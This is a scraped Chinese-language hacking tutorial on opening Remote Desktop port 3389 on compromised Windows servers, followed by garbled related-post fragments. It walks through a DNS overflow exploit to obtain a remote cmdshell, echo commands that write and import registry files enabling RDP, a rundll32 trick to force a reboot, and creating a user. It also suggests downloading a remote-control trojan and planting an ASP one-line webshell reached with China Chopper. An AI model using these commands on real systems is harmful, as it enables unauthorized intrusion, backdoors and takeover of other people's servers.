2. 程式人生 > >開啟遠程Windows系統3389端口

開啟遠程Windows系統3389端口

阿新 發佈:2018-01-24
服務器 div local body 容易 實現 ech layout hotkey

1、Win7、Win2003、XP系統
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

2、2000系統

簡要說一下如何進行DNS溢出攻擊。我用的溢出利用程序是dns.exe,在CMD下運行它可以看到它的使用參數等信息。執行"dns -s IP"命令檢測目標IP是否存在DNS溢出漏洞,若存在則進行溢出攻擊,執行"dns -t 2000all IP 1207"後提示要我們檢測返回的1100端口的shell。"telnet IP 1100"成功得到返回的cmdshell。註意目錄為c:/WINNT/system32,接著我們需要做的是使用"echo"命令寫入一個3389.reg註冊表文件。將如下代碼一行一行地復制到cmdshell窗口後按回 車執行:

echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg

簡單說明一下,">"符號是覆蓋寫入文件,如無此文件則創建,有則覆蓋原來的內容寫入。">>"是追加寫入,即在原有文件內容的基礎上在 後面寫入內容。這裏是寫入內容到3389.reg文件中!需要註意的是第二行,那個作用是寫入一行空格,因為.reg文件的格式 必須如此!成功寫入完畢後接著執行導入操作,執行"regedit /s 3389.reg"。這樣註冊表文件就已經順利導入到註冊表裏去了。不過需要註意的是在cmdshell下不要輸錯任何一個字符,否則將無法執行,建議先 自己打好在記事本上,確保無誤之後再復制到cmdshell窗口執行。然後可以用下面這個方法重啟目標主機。在cmdshell下執行如下代碼:

@ECHO OFF & cd/d %temp% & echo [version] > {out}.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> {out}.inf
echo [defaultinstall] >> {out}.inf
rundll32 setupapi,%inf% 1 %temp%/{out}.inf r

按順序將以上五行代碼一行一行地復制到cmdshell上,復制完一行按一次回車執行,五行都執行完畢後,服務器就會重啟的了。當然讓服務器重啟的方法比較多,比如結束掉系統關鍵進程、代碼模擬按鍵等都是可以的,如無意外,等待服 務器完成重啟之後再連接目標發現遠程桌面服務已經成功開啟了。至此Windows 2000操作系統溢出後返回的cmdshell下開啟遠程桌面服務就成功完成了。

3、2003系統

相對於2000的系 統來說,2003cmdshell下開啟遠程桌面服務就比較容易一些了,起碼無需重啟嘛!第一種方法也是用"echo"命令寫入一個 3389.reg文件,再"regedit /s 3389.reg"導入註冊表文件即可開啟,比較簡單,與上面介紹的2000的開啟方法類似。將如下代碼一行一行地復制到cmdshell窗口後按回車執 行:

echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg

完成以上操作後再執行"regedit /s 3389.reg"導入即可生效!不過這個方法相對來說比較麻煩。我們還可以用另外一種比較簡單的方法來開啟遠程桌面服務的。在介紹另一個操作方法之前,我們先來熟悉下2003系統下遠程桌面服務的一個最關鍵的註冊表鍵值。
在"HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"

下數值名稱為"fDenyTSConnections"的這一項,可以看到它的數值數據為1或0。數值為1的時候關閉遠程桌面服務,數值為0的時候開啟遠程 桌面服務。換句話說,我們只要可以在cmdshell下更改這個關鍵的註冊表鍵值數據就可以達到實現開啟遠程桌面服務的目的了!有幸的是,在2003下有 一個"reg"命令完全可以做到這一點。這裏我們找一臺操作系統為2003的服務器,通過和上面介紹的同樣方法溢出後返回一個cmdshell。當我們嘗試連接的時候會發現根本無法連接上去。下面詳細說明一下用"reg"命令開啟遠程桌面服務。執行:

reg query "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"

我們發現"fDenyTSConnections"鍵值數據為"0x1"。這個是十六進制數的1。上面提到,數據為1則沒有開啟遠程桌面服務。我們要做的就是把"0x1"改成"0x0"!直接用"reg add"是不行的,必須把原來鍵值刪掉再添加!在cmdshell下執行:

reg delete "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server" /v fDenyTSConnections

會詢問是否"要刪除註冊表值 fDenyTSConnections 嗎",當然Yes了。再執行:

reg add "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

提示操作成功完成。這樣就把"fDenyTSConnections"的值改為"0x0"了,我們可以執行:

reg query "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"

發現已經成功更改了數據。現在再來連接服務器的3389看看,發現已經可以成功連接上了,創建個用戶玩玩。至此2003下cmdshell開啟遠程桌面服務的方法也介紹完了。


溢出後也不一定要非要在cmdshell下開啟遠程桌面服務。
可以echo一個vbs文件,下載遠程控制木馬,然後在cmdshell裏運行一下木馬即可連接。
還有就是查詢目標IP是否綁定有網站,如果有則找到網站目錄,再用echo個一句話木馬進去(命令是:echo "<%execute request("cmd")%>" > WEB路徑/test.asp),用中國年菜刀連接,然後上傳大馬,上傳開3389的工具再開啟也行。

開啟遠程Windows系統3389端口

相關推薦

開啟Windows系統3389

服務器 div local body 容易 實現 ech layout hotkey 1、Win7、Win2003、XP系統REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyT

windows 修改桌面默認及對應的防火墻設置

編輯器 con parameter ons type 不能 技術分享 lru 端口範圍 新托管了兩臺服務,安裝系統windows server2012 遠程連接默認服務端口3389,為增加其安全性,現將默認端口3389更改為34535,如果你的電腦防火墻開著,請先修改防火墻

linux桌面 windows系統

linux 遠程 rdesktop linux桌面遠程windows系統1.安裝yum參考地址:http://lk886655.blog.51cto.com/7036409/19655482.安裝rdesktop#yum install rdesktop3.在命令行輸入下面命令即可#rdeskto

ssh服務之 登錄和轉發

繼續 沒有 分享圖片 需要 隨機字符串 端口號 公鑰加密 pre mage 一:Ssh遠程登錄服務 介紹:SSH 是創建在應用層和傳輸層基礎上的安全協議,為計算機上的 Shell(殼層)提供安全的傳輸和使用環境。 遠程登錄:ssh服務主要應用於遠程登錄 命令如下: ssh

Windows server 2008R2桌面3389修改方法技巧

使用 tco 方法 ren 端口 註冊 利用 操作系統 常常 windows server的服務器遠程桌面默認端口號是3389,在工作中經常使用遠程桌面連接服務器,但是這也是常常被黑客利用的端口號,但是如何修改掉默認端口,預防被黑客利用呢? 可以如下操作配置:很多人在使用w

sql server 2008 開啟1433,開啟連接

-1 image bsp 遠程連接 ges 開啟 cnblogs 設置 連接 通常情況下只需要設置兩處 sql server 2008 開啟1433端口,開啟遠程連接

linux下mysql開啟訪問權限及防火墻開放3306

base man recommend href table 防火墻配置 程序 from /etc/ 開啟mysql的遠程訪問權限 默認mysql的用戶是沒有遠程訪問的權限的,因此當程序跟數據庫不在同一臺服務器上時,我們需要開啟mysql的遠程訪問權限。 主流的有兩種方法,改

centos6.0如何開啟訪問權限及防火墻開放3306

mysql外網訪問在Linux中裝上mysql之後,發現windows中用navicat連接數據庫失敗,這是由於默認mysql的用戶是沒有遠程訪問的權限的,因此當navicat程序跟mysql數據庫不在同一臺服務器上時,我們需要開啟mysql的遠程訪問權限才能正常訪問mysql數據庫。主要的有兩種方法,改表法

windows server2008R2 開啟桌面

img 技術 運行 遠程 man 系統 nag connect http 微軟默認情況下把windows server2008R2遠程桌面是關閉的,如下幾步即可開啟: 1、打開系統屬性-遠程-選擇“僅允許運行使用網絡級別身份驗證的遠程桌面的計算機連接” 、 2、打開服務(運

windows查看占用以及關閉相應的進

這一 進程 繼續 pid 執行 div 3.6 占用 ask 開始--運行--cmd 進入命令提示符 輸入netstat -ano 即可看到所有連接的PID 之後在任務管理器中找到這個PID所對應的程序如果任務管理器中沒有PID這一項,可以在任務管理器中選"查看"-"選擇

【ansible】Windows開啟控制錯誤解決方案:無法檢查防火墻狀態

contain ret turn nbsp windows wall 解決方案 itl wrapper 這個在老版本的Windows系統才有這種bug。例如Windows 2008 R2和Windows 7,如果你的系統的阿裏雲的Windows server 2

windows 查看占用,殺進

查看進程 占用 -m ets taskkill win 殺進程 fin block 查看 443端口占用 netstat -ano | findstr "443" ,得到如下信息: TCP [::]:443 [::]:0 LISTENING 2320

Windows下80被進System占用的解決方法

mgr 效果 one style align 多說 控制 服務狀態 apache2 昨天剛更新了Windows10,總體上來說效果還是蠻不錯的,然而今天在開啟Apache服務器的時候卻發現,Apache莫名其妙的打不開了,起初以為是權限的問題,於是使用管理員身份的控制臺去

在ADUC中設置登錄到工作站功能,導致桌面訪問客戶 報錯:系統管理員已經限制你登錄的計算機

登錄 遇到 解決 nag net 計算機 preview 錯誤 報錯 在ADUC中設置登錄到工作站功能 遠程時錯誤提示:系統管理員已經限制你登錄的計算機。請在其他計算機上嘗試登錄。如果問題依然存在,請與系統管理員活技術支持聯系 經過我的研究,有兩種解決方案。 1 關閉nla

windows server 修改桌面連接口號

端口號 ins local edit regedit amber nstat pwd min 1、 【運行】輸入 regedit 2、 在註冊表編輯器中找到以下PortNamber鍵,改為要使用的遠程端口,如10000。   HKEY_LOCAL_MACHINE\SY

mysql開啟可連接

一行 允許 遠程連接 輸入 l數據庫 局域網 主機 ron flush 1.打開cmd窗口,進入MySql安裝的bin目錄 2.執行命令登錄數據庫,之後會出現一行要你輸入密碼的 mysql -u root -p 3.執行以下命令分配新用戶: grant al

wind 開啟訪問

是什麽 png 內部 打開防火墻 src -m 計算機 com dmi windows防火墻無法更改某些設置,錯誤代碼0x80070422 是什麽意思,怎麽搞定? 僅供參考。 1.無法打開操作中心-安全服務,解決方法: 控制面板-》管理工具-》服務,找到Security

ubuntu16.04服務器配置mysql,並開啟連接

service ber word width 試驗 alt images 沒有 and ubuntu16.04mysql安裝就不說了; 直接重點 這裏我用的是阿裏雲的ecs服務器,ubuntu16.04系統 1授權用戶,並允許遠程登錄; 默認的MySQL只有一個root賬

redis開啟訪問

檢查 down linux www bind true 提高 修改 pro 開始之前,記得檢查Linux下的防火墻是否開啟,若開啟redis端口是否在白名單內。Linux白名單相關操作不熟悉的看過來:http://www.cnblogs.com/JunFengChan/p/

MySQL開啟連接

mysql遠程連接 mysql 1.登錄mysql[[email protected]/* */ ~]# mysql -u root -pEnter password: 2.開啟遠程連接GRANT ALL PRIVILEGES ON *.* TO [email protected